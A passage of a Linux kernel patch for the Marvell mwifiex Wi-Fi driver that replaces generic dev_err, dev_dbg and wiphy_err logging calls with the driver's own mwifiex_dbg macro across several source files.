adapter->iface_limit.p2p_intf) { - wiphy_err(wiphy, - "cannot create multiple P2P ifaces\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create multiple P2P ifaces\n"); return ERR_PTR(-EINVAL); } priv = mwifiex_get_unused_priv(adapter); if (!priv) { - wiphy_err(wiphy, - "could not get free private struct\n"); + mwifiex_dbg(adapter, ERROR, + "could not get free private struct\n"); return ERR_PTR(-EFAULT); } @@ -2550,7 +2590,7 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, break; default: - wiphy_err(wiphy, "type not supported\n"); + mwifiex_dbg(adapter, ERROR, "type not supported\n"); return ERR_PTR(-EINVAL); } @@ -2558,7 +2598,8 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, name_assign_type, ether_setup, IEEE80211_NUM_ACS, 1); if (!dev) { - wiphy_err(wiphy, "no memory available for netdevice\n"); + mwifiex_dbg(adapter, ERROR, + "no memory available for netdevice\n"); memset(&priv->wdev, 0, sizeof(priv->wdev)); priv->wdev.iftype = NL80211_IFTYPE_UNSPECIFIED; priv->bss_mode = NL80211_IFTYPE_UNSPECIFIED; @@ -2599,7 +2640,8 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, /* Register network device */ if (register_netdevice(dev)) { - wiphy_err(wiphy, "cannot register virtual network device\n"); + mwifiex_dbg(adapter, ERROR, + "cannot register virtual network device\n"); free_netdev(dev); priv->bss_mode = NL80211_IFTYPE_UNSPECIFIED; priv->netdev = NULL; @@ -2613,7 +2655,8 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, WQ_MEM_RECLAIM | WQ_UNBOUND, 1, name); if (!priv->dfs_cac_workqueue) { - wiphy_err(wiphy, "cannot register virtual network device\n"); + mwifiex_dbg(adapter, ERROR, + "cannot register virtual network device\n"); free_netdev(dev); priv->bss_mode = NL80211_IFTYPE_UNSPECIFIED; priv->netdev = NULL; @@ -2628,7 +2671,8 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, WQ_HIGHPRI | WQ_UNBOUND | WQ_MEM_RECLAIM, 1, name); if (!priv->dfs_chan_sw_workqueue) { - wiphy_err(wiphy, "cannot register virtual network device\n"); + mwifiex_dbg(adapter, ERROR, + "cannot register virtual network device\n"); free_netdev(dev); priv->bss_mode = NL80211_IFTYPE_UNSPECIFIED; priv->netdev = NULL; @@ -2642,7 +2686,8 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, sema_init(&priv->async_sem, 1); - dev_dbg(adapter->dev, "info: %s: Marvell 802.11 Adapter\n", dev->name); + mwifiex_dbg(adapter, INFO, + "info: %s: Marvell 802.11 Adapter\n", dev->name); #ifdef CONFIG_DEBUG_FS mwifiex_dev_debugfs_init(priv); @@ -2661,7 +2706,7 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, adapter->curr_iface_comb.p2p_intf++; break; default: - wiphy_err(wiphy, "type not supported\n"); + mwifiex_dbg(adapter, ERROR, "type not supported\n"); return ERR_PTR(-EINVAL); } @@ -2721,7 +2766,8 @@ int mwifiex_del_virtual_intf(struct wiphy *wiphy, struct wireless_dev *wdev) adapter->curr_iface_comb.p2p_intf++; break; default: - dev_err(adapter->dev, "del_virtual_intf: type not supported\n"); + mwifiex_dbg(adapter, ERROR, + "del_virtual_intf: type not supported\n"); break; } @@ -2839,7 +2885,8 @@ static int mwifiex_set_wowlan_mef_entry(struct mwifiex_private *priv, if (!mwifiex_is_pattern_supported(&wowlan->patterns[i], byte_seq, MWIFIEX_MEF_MAX_BYTESEQ)) { - dev_err(priv->adapter->dev, "Pattern not supported\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Pattern not supported\n"); kfree(mef_entry); return -EOPNOTSUPP; } @@ -2954,21 +3001,22 @@ static int mwifiex_cfg80211_suspend(struct wiphy 
*wiphy, mwifiex_cancel_all_pending_cmd(adapter); if (!wowlan) { - dev_warn(adapter->dev, "None of the WOWLAN triggers enabled\n"); + mwifiex_dbg(adapter, ERROR, + "None of the WOWLAN triggers enabled\n"); return 0; } priv = mwifiex_get_priv(adapter, MWIFIEX_BSS_ROLE_STA); if (!priv->media_connected) { - dev_warn(adapter->dev, - "Can not configure WOWLAN in disconnected state\n"); + mwifiex_dbg(adapter, ERROR, + "Can not configure WOWLAN in disconnected state\n"); return 0; } ret = mwifiex_set_mef_filter(priv, wowlan); if (ret) { - dev_err(adapter->dev, "Failed to set MEF filter\n"); + mwifiex_dbg(adapter, ERROR, "Failed to set MEF filter\n"); return ret; } @@ -2981,7 +3029,8 @@ static int mwifiex_cfg80211_suspend(struct wiphy *wiphy, ret = mwifiex_set_hs_params(priv, HostCmd_ACT_GEN_SET, MWIFIEX_SYNC_CMD, &hs_cfg); if (ret) { - dev_err(adapter->dev, "Failed to set HS params\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to set HS params\n"); return ret; } } @@ -3041,7 +3090,8 @@ mwifiex_fill_coalesce_rule_info(struct mwifiex_private *priv, if (!mwifiex_is_pattern_supported(&crule->patterns[i], byte_seq, MWIFIEX_COALESCE_MAX_BYTESEQ)) { - dev_err(priv->adapter->dev, "Pattern not supported\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Pattern not supported\n"); return -EOPNOTSUPP; } @@ -3050,8 +3100,8 @@ mwifiex_fill_coalesce_rule_info(struct mwifiex_private *priv, pkt_type = mwifiex_get_coalesce_pkt_type(byte_seq); if (pkt_type && mrule->pkt_type) { - dev_err(priv->adapter->dev, - "Multiple packet types not allowed\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Multiple packet types not allowed\n"); return -EOPNOTSUPP; } else if (pkt_type) { mrule->pkt_type = pkt_type; @@ -3074,8 +3124,8 @@ mwifiex_fill_coalesce_rule_info(struct mwifiex_private *priv, } if (!mrule->pkt_type) { - dev_err(priv->adapter->dev, - "Packet type can not be determined\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Packet type can not be determined\n"); return -EOPNOTSUPP; } @@ -3093,8 +3143,8 @@ static int mwifiex_cfg80211_set_coalesce(struct wiphy *wiphy, memset(&coalesce_cfg, 0, sizeof(coalesce_cfg)); if (!coalesce) { - dev_dbg(adapter->dev, - "Disable coalesce and reset all previous rules\n"); + mwifiex_dbg(adapter, WARN, + "Disable coalesce and reset all previous rules\n"); return mwifiex_send_cmd(priv, HostCmd_CMD_COALESCE_CFG, HostCmd_ACT_GEN_SET, 0, &coalesce_cfg, true); @@ -3105,8 +3155,8 @@ static int mwifiex_cfg80211_set_coalesce(struct wiphy *wiphy, ret = mwifiex_fill_coalesce_rule_info(priv, &coalesce->rules[i], &coalesce_cfg.rule[i]); if (ret) { - dev_err(priv->adapter->dev, - "Recheck the patterns provided for rule %d\n", + mwifiex_dbg(adapter, ERROR, + "Recheck the patterns provided for rule %d\n", i + 1); return ret; } @@ -3138,9 +3188,9 @@ mwifiex_cfg80211_tdls_mgmt(struct wiphy *wiphy, struct net_device *dev, switch (action_code) { case WLAN_TDLS_SETUP_REQUEST: - dev_dbg(priv->adapter->dev, - "Send TDLS Setup Request to %pM status_code=%d\n", peer, - status_code); + mwifiex_dbg(priv->adapter, MSG, + "Send TDLS Setup Request to %pM status_code=%d\n", + peer, status_code); mwifiex_add_auto_tdls_peer(priv, peer); ret = mwifiex_send_tdls_data_frame(priv, peer, action_code, dialog_token, status_code, @@ -3148,45 +3198,45 @@ mwifiex_cfg80211_tdls_mgmt(struct wiphy *wiphy, struct net_device *dev, break; case WLAN_TDLS_SETUP_RESPONSE: mwifiex_add_auto_tdls_peer(priv, peer); - dev_dbg(priv->adapter->dev, - "Send TDLS Setup Response to %pM status_code=%d\n", - peer, status_code); + mwifiex_dbg(priv->adapter, MSG, + 
"Send TDLS Setup Response to %pM status_code=%d\n", + peer, status_code); ret = mwifiex_send_tdls_data_frame(priv, peer, action_code, dialog_token, status_code, extra_ies, extra_ies_len); break; case WLAN_TDLS_SETUP_CONFIRM: - dev_dbg(priv->adapter->dev, - "Send TDLS Confirm to %pM status_code=%d\n", peer, - status_code); + mwifiex_dbg(priv->adapter, MSG, + "Send TDLS Confirm to %pM status_code=%d\n", peer, + status_code); ret = mwifiex_send_tdls_data_frame(priv, peer, action_code, dialog_token, status_code, extra_ies, extra_ies_len); break; case WLAN_TDLS_TEARDOWN: - dev_dbg(priv->adapter->dev, "Send TDLS Tear down to %pM\n", - peer); + mwifiex_dbg(priv->adapter, MSG, + "Send TDLS Tear down to %pM\n", peer); ret = mwifiex_send_tdls_data_frame(priv, peer, action_code, dialog_token, status_code, extra_ies, extra_ies_len); break; case WLAN_TDLS_DISCOVERY_REQUEST: - dev_dbg(priv->adapter->dev, - "Send TDLS Discovery Request to %pM\n", peer); + mwifiex_dbg(priv->adapter, MSG, + "Send TDLS Discovery Request to %pM\n", peer); ret = mwifiex_send_tdls_data_frame(priv, peer, action_code, dialog_token, status_code, extra_ies, extra_ies_len); break; case WLAN_PUB_ACTION_TDLS_DISCOVER_RES: - dev_dbg(priv->adapter->dev, - "Send TDLS Discovery Response to %pM\n", peer); + mwifiex_dbg(priv->adapter, MSG, + "Send TDLS Discovery Response to %pM\n", peer); ret = mwifiex_send_tdls_action_frame(priv, peer, action_code, dialog_token, status_code, extra_ies, extra_ies_len); break; default: - dev_warn(priv->adapter->dev, - "Unknown TDLS mgmt/action frame %pM\n", peer); + mwifiex_dbg(priv->adapter, ERROR, + "Unknown TDLS mgmt/action frame %pM\n", peer); ret = -EINVAL; break; } @@ -3208,8 +3258,8 @@ mwifiex_cfg80211_tdls_oper(struct wiphy *wiphy, struct net_device *dev, if (!(priv->bss_type == MWIFIEX_BSS_TYPE_STA && priv->media_connected)) return -ENOTSUPP; - dev_dbg(priv->adapter->dev, - "TDLS peer=%pM, oper=%d\n", peer, action); + mwifiex_dbg(priv->adapter, MSG, + "TDLS peer=%pM, oper=%d\n", peer, action); switch (action) { case NL80211_TDLS_ENABLE_LINK: @@ -3220,22 +3270,22 @@ mwifiex_cfg80211_tdls_oper(struct wiphy *wiphy, struct net_device *dev, break; case NL80211_TDLS_TEARDOWN: /* shouldn't happen!*/ - dev_warn(priv->adapter->dev, - "tdls_oper: teardown from driver not supported\n"); + mwifiex_dbg(priv->adapter, ERROR, + "tdls_oper: teardown from driver not supported\n"); return -EINVAL; case NL80211_TDLS_SETUP: /* shouldn't happen!*/ - dev_warn(priv->adapter->dev, - "tdls_oper: setup from driver not supported\n"); + mwifiex_dbg(priv->adapter, ERROR, + "tdls_oper: setup from driver not supported\n"); return -EINVAL; case NL80211_TDLS_DISCOVERY_REQ: /* shouldn't happen!*/ - dev_warn(priv->adapter->dev, - "tdls_oper: discovery from driver not supported\n"); + mwifiex_dbg(priv->adapter, ERROR, + "tdls_oper: discovery from driver not supported\n"); return -EINVAL; default: - dev_err(priv->adapter->dev, - "tdls_oper: operation not supported\n"); + mwifiex_dbg(priv->adapter, ERROR, + "tdls_oper: operation not supported\n"); return -ENOTSUPP; } @@ -3268,8 +3318,8 @@ mwifiex_cfg80211_channel_switch(struct wiphy *wiphy, struct net_device *dev, struct mwifiex_private *priv = mwifiex_netdev_get_priv(dev); if (priv->adapter->scan_processing) { - dev_err(priv->adapter->dev, - "radar detection: scan in process...\n"); + mwifiex_dbg(priv->adapter, ERROR, + "radar detection: scan in process...\n"); return -EBUSY; } @@ -3284,8 +3334,8 @@ mwifiex_cfg80211_channel_switch(struct wiphy *wiphy, struct net_device *dev, 
params->beacon_csa.tail, params->beacon_csa.tail_len); if (!chsw_ie) { - dev_err(priv->adapter->dev, - "Could not parse channel switch announcement IE\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Could not parse channel switch announcement IE\n"); return -EINVAL; } @@ -3297,10 +3347,12 @@ mwifiex_cfg80211_channel_switch(struct wiphy *wiphy, struct net_device *dev, } if (mwifiex_del_mgmt_ies(priv)) - wiphy_err(wiphy, "Failed to delete mgmt IEs!\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to delete mgmt IEs!\n"); if (mwifiex_set_mgmt_ies(priv, ¶ms->beacon_csa)) { - wiphy_err(wiphy, "%s: setting mgmt ies failed\n", __func__); + mwifiex_dbg(priv->adapter, ERROR, + "%s: setting mgmt ies failed\n", __func__); return -EFAULT; } @@ -3324,16 +3376,17 @@ mwifiex_cfg80211_start_radar_detection(struct wiphy *wiphy, struct mwifiex_radar_params radar_params; if (priv->adapter->scan_processing) { - dev_err(priv->adapter->dev, - "radar detection: scan already in process...\n"); + mwifiex_dbg(priv->adapter, ERROR, + "radar detection: scan already in process...\n"); return -EBUSY; } if (!mwifiex_is_11h_active(priv)) { - dev_dbg(priv->adapter->dev, "Enable 11h extensions in FW\n"); + mwifiex_dbg(priv->adapter, INFO, + "Enable 11h extensions in FW\n"); if (mwifiex_11h_activate(priv, true)) { - dev_err(priv->adapter->dev, - "Failed to activate 11h extensions!!"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to activate 11h extensions!!"); return -1; } priv->state_11h.is_11h_active = true; @@ -3492,7 +3545,8 @@ int mwifiex_register_cfg80211(struct mwifiex_adapter *adapter) wiphy = wiphy_new(&mwifiex_cfg80211_ops, sizeof(struct mwifiex_adapter *)); if (!wiphy) { - dev_err(adapter->dev, "%s: creating new wiphy\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: creating new wiphy\n", __func__); return -ENOMEM; } wiphy->max_scan_ssids = MWIFIEX_MAX_SSID_LIST_LENGTH; @@ -3563,20 +3617,22 @@ int mwifiex_register_cfg80211(struct mwifiex_adapter *adapter) ret = wiphy_register(wiphy); if (ret < 0) { - dev_err(adapter->dev, - "%s: wiphy_register failed: %d\n", __func__, ret); + mwifiex_dbg(adapter, ERROR, + "%s: wiphy_register failed: %d\n", __func__, ret); wiphy_free(wiphy); return ret; } if (reg_alpha2 && mwifiex_is_valid_alpha2(reg_alpha2)) { - wiphy_info(wiphy, "driver hint alpha2: %2.2s\n", reg_alpha2); + mwifiex_dbg(adapter, INFO, + "driver hint alpha2: %2.2s\n", reg_alpha2); regulatory_hint(wiphy, reg_alpha2); } else { country_code = mwifiex_11d_code_2_region(adapter->region_code); if (country_code) - wiphy_info(wiphy, "ignoring F/W country code %2.2s\n", - country_code); + mwifiex_dbg(adapter, WARN, + "ignoring F/W country code %2.2s\n", + country_code); } mwifiex_send_cmd(priv, HostCmd_CMD_802_11_SNMP_MIB, diff --git a/drivers/net/wireless/mwifiex/cfp.c b/drivers/net/wireless/mwifiex/cfp.c index e9df8826f124..3ddb8ec676ed 100644 --- a/drivers/net/wireless/mwifiex/cfp.c +++ b/drivers/net/wireless/mwifiex/cfp.c @@ -327,8 +327,9 @@ mwifiex_get_cfp(struct mwifiex_private *priv, u8 band, u16 channel, u32 freq) sband = priv->wdev.wiphy->bands[IEEE80211_BAND_5GHZ]; if (!sband) { - dev_err(priv->adapter->dev, "%s: cannot find cfp by band %d\n", - __func__, band); + mwifiex_dbg(priv->adapter, ERROR, + "%s: cannot find cfp by band %d\n", + __func__, band); return cfp; } @@ -349,9 +350,10 @@ mwifiex_get_cfp(struct mwifiex_private *priv, u8 band, u16 channel, u32 freq) } } if (i == sband->n_channels) { - dev_err(priv->adapter->dev, "%s: cannot find cfp by band %d" - " & channel=%d freq=%d\n", __func__, band, 
channel, - freq); + mwifiex_dbg(priv->adapter, ERROR, + "%s: cannot find cfp by band %d\t" + "& channel=%d freq=%d\n", + __func__, band, channel, freq); } else { if (!ch) return cfp; @@ -431,15 +433,17 @@ u32 mwifiex_get_supported_rates(struct mwifiex_private *priv, u8 *rates) priv->bss_mode == NL80211_IFTYPE_P2P_CLIENT) { switch (adapter->config_bands) { case BAND_B: - dev_dbg(adapter->dev, "info: infra band=%d " - "supported_rates_b\n", adapter->config_bands); + mwifiex_dbg(adapter, INFO, "info: infra band=%d\t" + "supported_rates_b\n", + adapter->config_bands); k = mwifiex_copy_rates(rates, k, supported_rates_b, sizeof(supported_rates_b)); break; case BAND_G: case BAND_G | BAND_GN: - dev_dbg(adapter->dev, "info: infra band=%d " - "supported_rates_g\n", adapter->config_bands); + mwifiex_dbg(adapter, INFO, "info: infra band=%d\t" + "supported_rates_g\n", + adapter->config_bands); k = mwifiex_copy_rates(rates, k, supported_rates_g, sizeof(supported_rates_g)); break; @@ -449,15 +453,17 @@ u32 mwifiex_get_supported_rates(struct mwifiex_private *priv, u8 *rates) case BAND_A | BAND_B | BAND_G | BAND_GN | BAND_AN: case BAND_A | BAND_B | BAND_G | BAND_GN | BAND_AN | BAND_AAC: case BAND_B | BAND_G | BAND_GN: - dev_dbg(adapter->dev, "info: infra band=%d " - "supported_rates_bg\n", adapter->config_bands); + mwifiex_dbg(adapter, INFO, "info: infra band=%d\t" + "supported_rates_bg\n", + adapter->config_bands); k = mwifiex_copy_rates(rates, k, supported_rates_bg, sizeof(supported_rates_bg)); break; case BAND_A: case BAND_A | BAND_G: - dev_dbg(adapter->dev, "info: infra band=%d " - "supported_rates_a\n", adapter->config_bands); + mwifiex_dbg(adapter, INFO, "info: infra band=%d\t" + "supported_rates_a\n", + adapter->config_bands); k = mwifiex_copy_rates(rates, k, supported_rates_a, sizeof(supported_rates_a)); break; @@ -466,14 +472,16 @@ u32 mwifiex_get_supported_rates(struct mwifiex_private *priv, u8 *rates) case BAND_A | BAND_AN | BAND_AAC: case BAND_A | BAND_G | BAND_AN | BAND_GN: case BAND_A | BAND_G | BAND_AN | BAND_GN | BAND_AAC: - dev_dbg(adapter->dev, "info: infra band=%d " - "supported_rates_a\n", adapter->config_bands); + mwifiex_dbg(adapter, INFO, "info: infra band=%d\t" + "supported_rates_a\n", + adapter->config_bands); k = mwifiex_copy_rates(rates, k, supported_rates_a, sizeof(supported_rates_a)); break; case BAND_GN: - dev_dbg(adapter->dev, "info: infra band=%d " - "supported_rates_n\n", adapter->config_bands); + mwifiex_dbg(adapter, INFO, "info: infra band=%d\t" + "supported_rates_n\n", + adapter->config_bands); k = mwifiex_copy_rates(rates, k, supported_rates_n, sizeof(supported_rates_n)); break; @@ -482,25 +490,25 @@ u32 mwifiex_get_supported_rates(struct mwifiex_private *priv, u8 *rates) /* Ad-hoc mode */ switch (adapter->adhoc_start_band) { case BAND_B: - dev_dbg(adapter->dev, "info: adhoc B\n"); + mwifiex_dbg(adapter, INFO, "info: adhoc B\n"); k = mwifiex_copy_rates(rates, k, adhoc_rates_b, sizeof(adhoc_rates_b)); break; case BAND_G: case BAND_G | BAND_GN: - dev_dbg(adapter->dev, "info: adhoc G only\n"); + mwifiex_dbg(adapter, INFO, "info: adhoc G only\n"); k = mwifiex_copy_rates(rates, k, adhoc_rates_g, sizeof(adhoc_rates_g)); break; case BAND_B | BAND_G: case BAND_B | BAND_G | BAND_GN: - dev_dbg(adapter->dev, "info: adhoc BG\n"); + mwifiex_dbg(adapter, INFO, "info: adhoc BG\n"); k = mwifiex_copy_rates(rates, k, adhoc_rates_bg, sizeof(adhoc_rates_bg)); break; case BAND_A: case BAND_A | BAND_AN: - dev_dbg(adapter->dev, "info: adhoc A\n"); + mwifiex_dbg(adapter, INFO, "info: adhoc 
A\n"); k = mwifiex_copy_rates(rates, k, adhoc_rates_a, sizeof(adhoc_rates_a)); break; diff --git a/drivers/net/wireless/mwifiex/cmdevt.c b/drivers/net/wireless/mwifiex/cmdevt.c index 5b197860b584..ac89a1dd711b 100644 --- a/drivers/net/wireless/mwifiex/cmdevt.c +++ b/drivers/net/wireless/mwifiex/cmdevt.c @@ -62,7 +62,8 @@ mwifiex_get_cmd_node(struct mwifiex_adapter *adapter) spin_lock_irqsave(&adapter->cmd_free_q_lock, flags); if (list_empty(&adapter->cmd_free_q)) { - dev_err(adapter->dev, "GET_CMD_NODE: cmd node not available\n"); + mwifiex_dbg(adapter, ERROR, + "GET_CMD_NODE: cmd node not available\n"); spin_unlock_irqrestore(&adapter->cmd_free_q_lock, flags); return NULL; } @@ -116,7 +117,8 @@ static int mwifiex_cmd_host_cmd(struct mwifiex_private *priv, { /* Copy the HOST command to command buffer */ memcpy(cmd, pcmd_ptr->cmd, pcmd_ptr->len); - dev_dbg(priv->adapter->dev, "cmd: host cmd size = %d\n", pcmd_ptr->len); + mwifiex_dbg(priv->adapter, CMD, + "cmd: host cmd size = %d\n", pcmd_ptr->len); return 0; } @@ -147,8 +149,9 @@ static int mwifiex_dnld_cmd_to_fw(struct mwifiex_private *priv, /* Sanity test */ if (host_cmd == NULL || host_cmd->size == 0) { - dev_err(adapter->dev, "DNLD_CMD: host_cmd is null" - " or cmd size is 0, not sending\n"); + mwifiex_dbg(adapter, ERROR, + "DNLD_CMD: host_cmd is null\t" + "or cmd size is 0, not sending\n"); if (cmd_node->wait_q_enabled) adapter->cmd_wait_q.status = -1; mwifiex_recycle_cmd_node(adapter, cmd_node); @@ -161,8 +164,8 @@ static int mwifiex_dnld_cmd_to_fw(struct mwifiex_private *priv, if (adapter->hw_status == MWIFIEX_HW_STATUS_RESET && cmd_code != HostCmd_CMD_FUNC_SHUTDOWN && cmd_code != HostCmd_CMD_FUNC_INIT) { - dev_err(adapter->dev, - "DNLD_CMD: FW in reset state, ignore cmd %#x\n", + mwifiex_dbg(adapter, ERROR, + "DNLD_CMD: FW in reset state, ignore cmd %#x\n", cmd_code); if (cmd_node->wait_q_enabled) mwifiex_complete_cmd(adapter, cmd_node); @@ -197,10 +200,11 @@ static int mwifiex_dnld_cmd_to_fw(struct mwifiex_private *priv, */ skb_put(cmd_node->cmd_skb, cmd_size - cmd_node->cmd_skb->len); - dev_dbg(adapter->dev, - "cmd: DNLD_CMD: %#x, act %#x, len %d, seqno %#x\n", cmd_code, - le16_to_cpu(*(__le16 *) ((u8 *) host_cmd + S_DS_GEN)), cmd_size, - le16_to_cpu(host_cmd->seq_num)); + mwifiex_dbg(adapter, CMD, + "cmd: DNLD_CMD: %#x, act %#x, len %d, seqno %#x\n", + cmd_code, + le16_to_cpu(*(__le16 *)((u8 *)host_cmd + S_DS_GEN)), + cmd_size, le16_to_cpu(host_cmd->seq_num)); mwifiex_dbg_dump(adapter, CMD_D, "cmd buffer:", host_cmd, cmd_size); if (adapter->iface_type == MWIFIEX_USB) { @@ -222,7 +226,8 @@ static int mwifiex_dnld_cmd_to_fw(struct mwifiex_private *priv, } if (ret == -1) { - dev_err(adapter->dev, "DNLD_CMD: host to card failed\n"); + mwifiex_dbg(adapter, ERROR, + "DNLD_CMD: host to card failed\n"); if (adapter->iface_type == MWIFIEX_USB) adapter->cmd_sent = false; if (cmd_node->wait_q_enabled) @@ -281,8 +286,8 @@ static int mwifiex_dnld_sleep_confirm_cmd(struct mwifiex_adapter *adapter) (adapter->seq_num, priv->bss_num, priv->bss_type))); - dev_dbg(adapter->dev, - "cmd: DNLD_CMD: %#x, act %#x, len %d, seqno %#x\n", + mwifiex_dbg(adapter, CMD, + "cmd: DNLD_CMD: %#x, act %#x, len %d, seqno %#x\n", le16_to_cpu(sleep_cfm_buf->command), le16_to_cpu(sleep_cfm_buf->action), le16_to_cpu(sleep_cfm_buf->size), @@ -314,7 +319,7 @@ static int mwifiex_dnld_sleep_confirm_cmd(struct mwifiex_adapter *adapter) } if (ret == -1) { - dev_err(adapter->dev, "SLEEP_CFM: failed\n"); + mwifiex_dbg(adapter, ERROR, "SLEEP_CFM: failed\n"); 
adapter->dbg.num_cmd_sleep_cfm_host_to_card_failure++; return -1; } @@ -365,8 +370,8 @@ int mwifiex_alloc_cmd_buffer(struct mwifiex_adapter *adapter) for (i = 0; i < MWIFIEX_NUM_OF_CMD_BUFFER; i++) { cmd_array[i].skb = dev_alloc_skb(MWIFIEX_SIZE_OF_CMD_BUFFER); if (!cmd_array[i].skb) { - dev_err(adapter->dev, - "unable to allocate command buffer\n"); + mwifiex_dbg(adapter, ERROR, + "unable to allocate command buffer\n"); return -ENOMEM; } } @@ -390,7 +395,8 @@ int mwifiex_free_cmd_buffer(struct mwifiex_adapter *adapter) /* Need to check if cmd pool is allocated or not */ if (!adapter->cmd_pool) { - dev_dbg(adapter->dev, "info: FREE_CMD_BUF: cmd_pool is null\n"); + mwifiex_dbg(adapter, FATAL, + "info: FREE_CMD_BUF: cmd_pool is null\n"); return 0; } @@ -399,7 +405,8 @@ int mwifiex_free_cmd_buffer(struct mwifiex_adapter *adapter) /* Release shared memory buffers */ for (i = 0; i < MWIFIEX_NUM_OF_CMD_BUFFER; i++) { if (cmd_array[i].skb) { - dev_dbg(adapter->dev, "cmd: free cmd buffer %d\n", i); + mwifiex_dbg(adapter, CMD, + "cmd: free cmd buffer %d\n", i); dev_kfree_skb_any(cmd_array[i].skb); } if (!cmd_array[i].resp_skb) @@ -413,7 +420,8 @@ int mwifiex_free_cmd_buffer(struct mwifiex_adapter *adapter) } /* Release struct cmd_ctrl_node */ if (adapter->cmd_pool) { - dev_dbg(adapter->dev, "cmd: free cmd pool\n"); + mwifiex_dbg(adapter, CMD, + "cmd: free cmd pool\n"); kfree(adapter->cmd_pool); adapter->cmd_pool = NULL; } @@ -463,7 +471,7 @@ int mwifiex_process_event(struct mwifiex_adapter *adapter) rx_info->bss_type = priv->bss_type; } - dev_dbg(adapter->dev, "EVENT: cause: %#x\n", eventcause); + mwifiex_dbg(adapter, EVENT, "EVENT: cause: %#x\n", eventcause); mwifiex_dbg_dump(adapter, EVT_D, "Event Buf:", skb->data, skb->len); if (priv->bss_role == MWIFIEX_BSS_ROLE_UAP) @@ -503,28 +511,33 @@ int mwifiex_send_cmd(struct mwifiex_private *priv, u16 cmd_no, } if (adapter->is_suspended) { - dev_err(adapter->dev, "PREP_CMD: device in suspended state\n"); + mwifiex_dbg(adapter, ERROR, + "PREP_CMD: device in suspended state\n"); return -1; } if (adapter->hs_enabling && cmd_no != HostCmd_CMD_802_11_HS_CFG_ENH) { - dev_err(adapter->dev, "PREP_CMD: host entering sleep state\n"); + mwifiex_dbg(adapter, ERROR, + "PREP_CMD: host entering sleep state\n"); return -1; } if (adapter->surprise_removed) { - dev_err(adapter->dev, "PREP_CMD: card is removed\n"); + mwifiex_dbg(adapter, ERROR, + "PREP_CMD: card is removed\n"); return -1; } if (adapter->is_cmd_timedout) { - dev_err(adapter->dev, "PREP_CMD: FW is in bad state\n"); + mwifiex_dbg(adapter, ERROR, + "PREP_CMD: FW is in bad state\n"); return -1; } if (adapter->hw_status == MWIFIEX_HW_STATUS_RESET) { if (cmd_no != HostCmd_CMD_FUNC_INIT) { - dev_err(adapter->dev, "PREP_CMD: FW in reset state\n"); + mwifiex_dbg(adapter, ERROR, + "PREP_CMD: FW in reset state\n"); return -1; } } @@ -533,7 +546,8 @@ int mwifiex_send_cmd(struct mwifiex_private *priv, u16 cmd_no, cmd_node = mwifiex_get_cmd_node(adapter); if (!cmd_node) { - dev_err(adapter->dev, "PREP_CMD: no free cmd node\n"); + mwifiex_dbg(adapter, ERROR, + "PREP_CMD: no free cmd node\n"); return -1; } @@ -541,7 +555,8 @@ int mwifiex_send_cmd(struct mwifiex_private *priv, u16 cmd_no, mwifiex_init_cmd_node(priv, cmd_node, cmd_oid, data_buf, sync); if (!cmd_node->cmd_skb) { - dev_err(adapter->dev, "PREP_CMD: no free cmd buf\n"); + mwifiex_dbg(adapter, ERROR, + "PREP_CMD: no free cmd buf\n"); return -1; } @@ -576,7 +591,8 @@ int mwifiex_send_cmd(struct mwifiex_private *priv, u16 cmd_no, /* Return error, since the command 
preparation failed */ if (ret) { - dev_err(adapter->dev, "PREP_CMD: cmd %#x preparation failed\n", + mwifiex_dbg(adapter, ERROR, + "PREP_CMD: cmd %#x preparation failed\n", cmd_no); mwifiex_insert_cmd_to_free_q(adapter, cmd_node); return -1; @@ -631,7 +647,8 @@ void mwifiex_recycle_cmd_node(struct mwifiex_adapter *adapter, mwifiex_insert_cmd_to_free_q(adapter, cmd_node); atomic_dec(&adapter->cmd_pending); - dev_dbg(adapter->dev, "cmd: FREE_CMD: cmd=%#x, cmd_pending=%d\n", + mwifiex_dbg(adapter, CMD, + "cmd: FREE_CMD: cmd=%#x, cmd_pending=%d\n", le16_to_cpu(host_cmd->command), atomic_read(&adapter->cmd_pending)); } @@ -653,7 +670,7 @@ mwifiex_insert_cmd_to_pending_q(struct mwifiex_adapter *adapter, host_cmd = (struct host_cmd_ds_command *) (cmd_node->cmd_skb->data); if (!host_cmd) { - dev_err(adapter->dev, "QUEUE_CMD: host_cmd is NULL\n"); + mwifiex_dbg(adapter, ERROR, "QUEUE_CMD: host_cmd is NULL\n"); return; } @@ -678,7 +695,8 @@ mwifiex_insert_cmd_to_pending_q(struct mwifiex_adapter *adapter, spin_unlock_irqrestore(&adapter->cmd_pending_q_lock, flags); atomic_inc(&adapter->cmd_pending); - dev_dbg(adapter->dev, "cmd: QUEUE_CMD: cmd=%#x, cmd_pending=%d\n", + mwifiex_dbg(adapter, CMD, + "cmd: QUEUE_CMD: cmd=%#x, cmd_pending=%d\n", command, atomic_read(&adapter->cmd_pending)); } @@ -704,7 +722,8 @@ int mwifiex_exec_next_cmd(struct mwifiex_adapter *adapter) /* Check if already in processing */ if (adapter->curr_cmd) { - dev_err(adapter->dev, "EXEC_NEXT_CMD: cmd in processing\n"); + mwifiex_dbg(adapter, FATAL, + "EXEC_NEXT_CMD: cmd in processing\n"); return -1; } @@ -726,8 +745,9 @@ int mwifiex_exec_next_cmd(struct mwifiex_adapter *adapter) priv = cmd_node->priv; if (adapter->ps_state != PS_STATE_AWAKE) { - dev_err(adapter->dev, "%s: cannot send cmd in sleep state," - " this should not happen\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: cannot send cmd in sleep state,\t" + "this should not happen\n", __func__); spin_unlock_irqrestore(&adapter->mwifiex_cmd_lock, cmd_flags); 